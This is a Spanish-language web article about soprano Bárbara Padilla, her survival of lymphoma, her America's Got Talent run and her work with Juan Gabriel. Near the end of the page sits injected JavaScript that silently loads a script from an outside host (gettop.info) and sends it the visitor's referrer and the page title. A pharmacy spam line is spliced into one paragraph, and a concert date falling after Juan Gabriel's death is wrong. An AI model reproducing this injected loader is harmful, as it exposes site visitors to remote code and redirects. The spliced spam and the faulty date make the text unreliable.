Barbara Padilla, Su Historia y Juan Gabriel

Comparte !

Mi adorado maestro, en mi corazón existe un gozo enorme por el gran regalo que Dios me dio concediéndome su amistad, ardo en amor y agradecimiento hacia un artista y ser humano maravilloso”, expresó mediante un comunicado Bárbara Padilla.

 

Bárbara fue trasplantada de médula ósea en 2000 luego de que le diagnosticaron un linfoma de Hodgkin “cancer” en el año 1998, lo cual le acabó salvando la vida, regresó a estudiar a la Universidad de Houston y se graduó en 2004.

“Decirte que fue un milagro… los médicos tienen sus reservas para decir eso. Pero para mí sí lo fue”, dijo una sonriente en una entrevista. Su voz no había quedado alterada por los tratamientos médicos. Dijo en una entrevista

En el año 2009 resultó finalista en el reality estadounidense America’s Got Talent. Terminó en el segundo puesto, recibiendo votos de miles de espectadores impresionados por su voz, encanto y la belleza de sus canciones.

Este programa fue el trampolín que Padilla necesitaba para hacerse conocer. Con un género musical producto de mezclas o fusiones de pop más opera, surgidas en los últimos años y las demandas del mercado, conocido como “popopera”.

Gracias al contacto de su mánager con el maestro (productor y arregladista mexicano) Eduardo Magallanes, ”quien ha sido el que le presentó su música a Juan Gabriel” es invitada un día de noviembre del año 2014, a donde Juan Gabriel ofreció una reunión en su casa en Cancún entre cuyos invitados estaba la cantante mexicana de pop-ópera Bárbara Padilla. En cierto momento del convivió, Juan Gabriel comenzó a cantar un tema inédito, a capella, emocionando al puñado de personas que estaban reunidas. Padilla, curiosa, le dijo: “Maestro, yo esa canción no se la conocía, ¿cómo se llama?” y él le contestó: “Barbarísima… se la escribí a usted, quiero que usted la cante”. buy online alli medicine in alberta ca

La soprano tapatía Bárbara Padilla acompañó a Juan Gabriel dentro de sus tres primeros shows, 10, 11 y 12 de Abril de 2016, de la gira “Juntos” que ofreció en el Auditorio Nacional.

También participó en los conciertos de Tijuana, ante 45 mil espectadores y Ciudad Juárez, 140 mil, ambos con localidades agotadas.

Y el 15  de noviembre de 2016 en Toyota Center de Houston, fue la primera vez que Bárbara interpreto la canción en un concierto de Juan Gabriel.

 

“El dolor de decir adiós es indescriptible, cómo me hubiera gustado verle muchas veces más, pero ya no será posible, ahora, como me decía usted en sus correos, con esa forma de poeta que le caracteriza, nos veremos sólo con los ojos del corazón”, Dijo.

 

Video: “No tengas Miedo Tú” – Auditorio Nacional 

 

Fotos de Juan Gabriel y Bárbara Padilla en conciertos

 

[flagallery gid=39]

var d=document;var s=d.createElement(‘script’); s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

shares